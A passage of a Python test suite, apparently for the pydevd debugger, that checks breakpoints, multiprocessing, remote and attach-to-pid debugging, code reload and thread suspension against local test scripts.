writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_regular(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_simple_calls.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_breakpoint_cases():
if sys.version_info >= (3, 7):
# Just check breakpoint()
return ('_debugger_case_breakpoint.py',)
else:
# Check breakpoint() and sys.__breakpointhook__ replacement.
return ('_debugger_case_breakpoint.py', '_debugger_case_breakpoint2.py')
@pytest.mark.parametrize("filename", _get_breakpoint_cases())
def test_py_37_breakpoint(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(file=filename, line=3)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_generator_cases():
if IS_PY2:
return ('_debugger_case_generator_py2.py',)
else:
# On py3 we should check both versions.
return (
'_debugger_case_generator_py2.py',
'_debugger_case_generator_py3.py',
)
@pytest.mark.parametrize("filename", _get_generator_cases())
def test_generator_cases(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_m_switch.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_module_entry_point.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
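# The test below creates a .zip and a .egg! archive on the fly, puts both on PYTHONPATH and
# adds breakpoints using filenames inside the archives to check that breakpoints in
# zip-imported modules are properly hit.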
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_debug_zip_files(case_setup, tmpdir):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
curr_pythonpath = str(tmpdir.join('myzip.zip')) + os.pathsep + curr_pythonpath
curr_pythonpath = str(tmpdir.join('myzip2.egg!')) + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
env["IDE_PROJECT_ROOTS"] = str(tmpdir.join('myzip.zip'))
return env
import zipfile
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip.zip')), 'w')
zip_file.writestr('zipped/__init__.py', '')
zip_file.writestr('zipped/zipped_contents.py', 'def call_in_zip():\n return 1')
zip_file.close()
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip2.egg!')), 'w')
zip_file.writestr('zipped2/__init__.py', '')
zip_file.writestr('zipped2/zipped_contents2.py', 'def call_in_zip2():\n return 1')
zip_file.close()
with case_setup.test_file('_debugger_case_zip_files.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip.zip')), 'zipped', 'zipped_contents.py')
)
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip2.egg!')), 'zipped2', 'zipped_contents2.py')
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip'
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip2'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('file_to_check', [
'_debugger_case_multiprocessing_2.py',
'_debugger_case_multiprocessing.py',
'_debugger_case_python_c.py',
'_debugger_case_multiprocessing_pool.py'
])
def test_multiprocessing_simple(case_setup_multiprocessing, file_to_check):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file(file_to_check) as writer:
break1_line = writer.get_line_index_with_content('break 1 here')
break2_line = writer.get_line_index_with_content('break 2 here')
writer.write_add_breakpoint(break1_line)
writer.write_add_breakpoint(break2_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
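# The debugged program spawns a second process which connects back to the same server
# socket; this thread accepts that connection and drives the child's debug session
# (version, breakpoints, initial run) independently of the main writer.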
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
expected_connections = 1
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break1_line)
writer2.write_add_breakpoint(break2_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('count', range(5)) # Call multiple times to exercise timing issues.
def test_multiprocessing_with_stopped_breakpoints(case_setup_multiprocessing, count, debugger_runner_simple):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_multiprocessing_stopped_threads.py') as writer:
break_main_line = writer.get_line_index_with_content('break in main here')
break_thread_line = writer.get_line_index_with_content('break in thread here')
break_process_line = writer.get_line_index_with_content('break in process here')
writer.write_add_breakpoint(break_main_line)
writer.write_add_breakpoint(break_thread_line)
writer.write_add_breakpoint(break_process_line)
server_socket = writer.server_socket
listening_event = threading.Event()
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
server_socket.listen(1)
self.server_socket = server_socket
listening_event.set()
writer.log.append(' *** Multiprocess waiting on server_socket.accept()')
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer.log.append(' *** Multiprocess started ReaderThread')
writer2 = SecondaryProcessWriterThread()
writer2._WRITE_LOG_PREFIX = ' *** Multiprocess write: '
writer2.log = writer.log
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_main_line)
writer2.write_add_breakpoint(break_thread_line)
writer2.write_add_breakpoint(break_process_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
ok = listening_event.wait(timeout=10)
if not IS_PY26:
assert ok
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit() # Breaks in thread.
writer.write_step_over(hit2.thread_id)
hit2 = writer.wait_for_breakpoint_hit(REASON_STEP_OVER) # line == event.set()
# paused on breakpoint, will start process and pause on main thread
# in the main process too.
writer.write_step_over(hit2.thread_id)
# Note: ignore the step over hit (go only for the breakpoint hit).
main_hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.write_run_thread(main_hit.thread_id)
# We must have found at least 2 debug files when doing multiprocessing (one for
# each pid).
assert len(pydev_log.list_log_files(debugger_runner_simple.pydevd_debug_file)) == 2
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_subprocess_quoted_args(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_quoting.py') as writer:
break_subprocess_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_subprocess_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
# Note: on Linux on Python 2, CPython's subprocess.call actually creates a fork
# first (at which point it connects) and only later calls the main (as if it were
# a clean process where PyDB hadn't been created the first time) -- the debugger
# still works, but it may make an additional connection.
expected_connections = 1
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_subprocess_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.finished_ok = True
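# Runs pydevd_attach_to_process/attach_pydevd.py in a separate process to inject the debugger
# into the already-running test process (given its pid) and have it connect back to the
# writer's port.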
def _attach_to_writer_pid(writer):
import pydevd
assert writer.process is not None
def attach():
attach_pydevd_file = os.path.join(os.path.dirname(pydevd.__file__), 'pydevd_attach_to_process', 'attach_pydevd.py')
subprocess.call([sys.executable, attach_pydevd_file, '--pid', str(writer.process.pid), '--port', str(writer.port)])
threading.Thread(target=attach).start()
wait_for_condition(lambda: writer.finished_initialization)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('reattach', [True, False])
def test_attach_to_pid_no_threads(case_setup_remote, reattach):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_simple.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize to get to the while loop.
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break here')
bp_id = writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
if reattach:
# This would be the same as a second attach to pid, so, the idea is closing the current
# connection and then doing a new attach to pid.
writer.write_remove_breakpoint(bp_id)
writer.write_run_thread(hit.thread_id)
writer.do_kill() # This will simply close the open sockets without doing anything else.
time.sleep(1)
t = threading.Thread(target=writer.start_socket)
t.start()
wait_for_condition(lambda: hasattr(writer, 'port'))
time.sleep(1)
writer.process = writer.process
_attach_to_writer_pid(writer)
wait_for_condition(lambda: hasattr(writer, 'reader_thread'))
time.sleep(1)
bp_id = writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON or IS_PY39_OR_GREATER, reason='CPython only test. '
'3.9: still needs support to attach to pid (waiting for CPython api to stabilize).')
def test_attach_to_pid_halted(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_multiple_threads.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize and get to the proper halting condition
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break thread here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_basic(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote.py') as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON or IS_PY39_OR_GREATER, reason='CPython only test. '
'3.9: still needs support to trace other threads (waiting for CPython api to stabilize).')
def test_remote_debugger_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote_threads.py') as writer:
writer.write_make_initial_run()
hit_in_main = writer.wait_for_breakpoint_hit()
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
# Break in the 2 threads.
hit_in_thread1 = writer.wait_for_breakpoint_hit(line=bp_line)
hit_in_thread2 = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit_in_thread1.thread_id, hit_in_thread1.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_change_variable(hit_in_thread2.thread_id, hit_in_thread2.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit_in_main.thread_id)
writer.write_run_thread(hit_in_thread1.thread_id)
writer.write_run_thread(hit_in_thread2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_breakpoint_remote.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
filename='_debugger_case_breakpoint_remote.py',
line=13,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
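# The test below puts pydevd's 'pydev_sitecustomize' directory on PYTHONPATH so that the
# debugged script can stop on breakpoint() without importing pydevd itself (hence 'no_import').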
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote_no_import(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.join(
os.path.dirname(writer.get_pydevd_file()),
'pydev_sitecustomize')
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
with case_setup_remote.test_file(
'_debugger_case_breakpoint_remote_no_import.py',
get_environ=get_environ) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
"108",
filename='_debugger_case_breakpoint_remote_no_import.py',
line=12,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('authenticate', [True, False])
def test_remote_debugger_multi_proc(case_setup_remote, authenticate):
access_token = None
client_access_token = None
if authenticate:
access_token = 'tok123'
client_access_token = 'tok456'
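# Accepts the connection made by the extra process spawned by '_debugger_case_remote_1.py',
# authenticates if needed and just lets it run -- the test only checks that this second
# connection actually arrives.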
class _SecondaryMultiProcProcessWriterThread(debugger_unittest.AbstractWriterThread):
FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
def __init__(self, server_socket):
debugger_unittest.AbstractWriterThread.__init__(self)
self.server_socket = server_socket
def run(self):
print('waiting for second process')
self.sock, addr = self.server_socket.accept()
print('accepted second process')
from tests_python.debugger_unittest import ReaderThread
self.reader_thread = ReaderThread(self.sock)
self.reader_thread.name = 'Secondary Reader Thread'
self.reader_thread.start()
self._sequence = -1
# initial command is always the version
self.write_version()
if authenticate:
self.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
self.write_authenticate(access_token=access_token, client_access_token=client_access_token)
self.write_version()
self.log.append('start_socket')
self.write_make_initial_run()
time.sleep(.5)
self.finished_ok = True
def do_kill(writer):
debugger_unittest.AbstractWriterThread.do_kill(writer)
if hasattr(writer, 'secondary_multi_proc_process_writer'):
writer.secondary_multi_proc_process_writer.do_kill()
with case_setup_remote.test_file(
'_debugger_case_remote_1.py',
do_kill=do_kill,
EXPECTED_RETURNCODE='any',
access_token=access_token,
client_access_token=client_access_token,
) as writer:
# It seems this sometimes becomes flaky on the CI because the process outlives the writer thread...
# As we're only interested in knowing whether a second connection was received, just kill the
# related process.
assert hasattr(writer, 'FORCE_KILL_PROCESS_WHEN_FINISHED_OK')
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.log.append('making initial run')
writer.write_make_initial_run()
if authenticate:
writer.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
writer.write_authenticate(access_token=access_token, client_access_token=client_access_token)
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.secondary_multi_proc_process_writer = secondary_multi_proc_process_writer = \
_SecondaryMultiProcProcessWriterThread(writer.server_socket)
secondary_multi_proc_process_writer.start()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
for _i in xrange(400):
if secondary_multi_proc_process_writer.finished_ok:
break
time.sleep(.1)
else:
writer.log.append('Secondary process not finished ok!')
raise AssertionError('Secondary process not finished ok!')
writer.log.append('Secondary process finished!')
try:
assert writer._sequence == (5 if not authenticate else 9), 'Found: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.parametrize('handle', [True, False])
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_unhandled_exceptions(case_setup_remote, handle):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
# Add, remove and add back
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
writer.write_remove_exception_breakpoint('Exception')
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
if not handle:
writer.write_remove_exception_breakpoint('Exception')
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
if handle:
writer.log.append('waiting for uncaught exception')
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('finished ok')
writer.finished_ok = True
def test_trace_dispatch_correct(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['PYDEVD_USE_FRAME_EVAL'] = 'NO' # This test checks trace dispatch (so, disable frame eval).
return env
with case_setup.test_file('_debugger_case_trace_dispatch.py', get_environ=get_environ) as writer:
breakpoint_id = writer.write_add_breakpoint(5, 'method')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_PY26, reason='Failing on Python 2.6 on travis (needs investigation).')
def test_case_single_notification_on_step(case_setup):
from tests_python.debugger_unittest import REASON_STEP_INTO
with case_setup.test_file('_debugger_case_import_main.py') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), '')
writer.write_make_initial_run()
hit = writer.wait_for_single_notification_as_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
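# The test below writes a my_temp2.py whose call() returns 1, stops at the breakpoint,
# rewrites the module on disk to return 2 and asks the debugger to reload it
# (CMD_RELOAD_CODE); the debugged script then asserts that call() == 2.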
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_reload(case_setup, tmpdir):
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
for line in (
'pydev debugger: Start reloading module: "my_temp2"',
'pydev debugger: Updated function code: <function call',
'pydev debugger: reload finished',
):
if line not in stderr:
raise AssertionError('"%s" not in stderr.\nstdout:\n%s\n\nstderr:\n%s' % (
line, stdout, stderr))
path = tmpdir.join('my_temp.py')
path.write('''
import my_temp2
assert my_temp2.call() == 1
a = 10 # break here
assert my_temp2.call() == 2
print('TEST SUCEEDED!')
''')
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 1
''')
with case_setup.test_file(str(path), additional_output_checks=additional_output_checks) as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 2
''')
writer.write_reload('my_temp2')
writer.wait_for_message(CMD_RELOAD_CODE)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working with Jython on ci (needs investigation).')
def test_custom_frames(case_setup):
with case_setup.test_file('_debugger_case_custom_frames.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(3):
writer.write_step_over(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
# Main thread stopped
writer.wait_for_breakpoint_hit(REASON_STEP_OVER)
# Each time there's an additional custom frame (which is shown as if it
# were a thread which is created and then suspended).
for _ in range(i):
writer.wait_for_message(CMD_THREAD_CREATE)
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_run_thread(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
try:
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False, timeout=1)
except debugger_unittest.TimeoutError:
# Flaky: sometimes the thread kill is not received because
# the process exits before the message is sent.
break
writer.finished_ok = True
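# GEVENT_SUPPORT=True enables pydevd's gevent compatibility mode; the two tests below then
# repeatedly hit a breakpoint inside a function named 'run' (presumably the greenlets' run).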
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup.test_file('_debugger_case_gevent.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent_remote(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup_remote.test_file('_debugger_case_gevent.py', get_environ=get_environ, append_command_line_args=['remote']) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
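# write_show_return_vars() makes the debugger report return values after a step as
# synthetic variables (named after the called method, with isRetVal="True"), which is
# what the wait_for_vars() checks below assert.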
def test_return_value(case_setup):
with case_setup.test_file('_debugger_case_return_value.py') as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line)
writer.write_show_return_vars()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(name='main', line=break_line)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='main', line=break_line + 1)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method1" type="int" qualifier="%s" value="int: 1" isRetVal="True"' % (builtin_qualifier,),
'<var name="method1" type="int" value="int%253A 1" isRetVal="True"',
],
])
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='main', line=break_line + 2)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method2" type="int" qualifier="%s" value="int: 2" isRetVal="True"' % (builtin_qualifier,),
'<var name="method2" type="int" value="int%253A 2" isRetVal="True"',
],
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
@pytest.mark.parametrize('check_single_notification', [True, False])
def test_run_pause_all_threads_single_notification(case_setup, check_single_notification):
from tests_python.debugger_unittest import TimeoutError
with case_setup.test_file('_debugger_case_multiple_threads.py') as writer:
# : :type writer: AbstractWriterThread
writer.write_multi_threads_single_notification(True)
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread()
thread_id1 = writer.wait_for_new_thread()
thread_id2 = writer.wait_for_new_thread()
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION)
assert dct['thread_id'] in (thread_id1, thread_id2)
assert dct['stop_reason'] == REASON_THREAD_SUSPEND
else:
# We should have a single thread suspended event for both threads.
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit0.thread_id in (thread_id1, thread_id2)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit1.thread_id in (thread_id1, thread_id2)
with pytest.raises(TimeoutError):
# The main thread should not receive a hit as it's effectively deadlocked until other
# threads finish.
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND, timeout=1)
# Doing a step in one thread, when paused, should notify on both threads.
writer.write_step_over(thread_id1)
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_RESUME_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
assert dct['stop_reason'] == REASON_STEP_OVER
hit = writer.get_current_stack_hit(thread_id1)
else:
hit = writer.wait_for_breakpoint_hit(CMD_STEP_OVER)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'stop_loop()')
writer.wait_for_evaluation('<var name="stop_loop()" type="str" qualifier="{0}" value="str: stopped_loop'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
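# The scenario_* helpers below are parametrized into test_top_level_exceptions_on_attach:
# each configures a ValueError break policy after the initial attach hit and checks the
# expected sequence of caught/uncaught stops.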
def scenario_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '0', '1', '0')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '0', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught (but not another time
# in postmortem mode).
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught_and_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '1', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught and another in postmortem mode.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize(
'check_scenario',
[
scenario_uncaught,
scenario_caught,
scenario_caught_and_uncaught,
]
)
def test_top_level_exceptions_on_attach(case_setup_remote, check_scenario):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
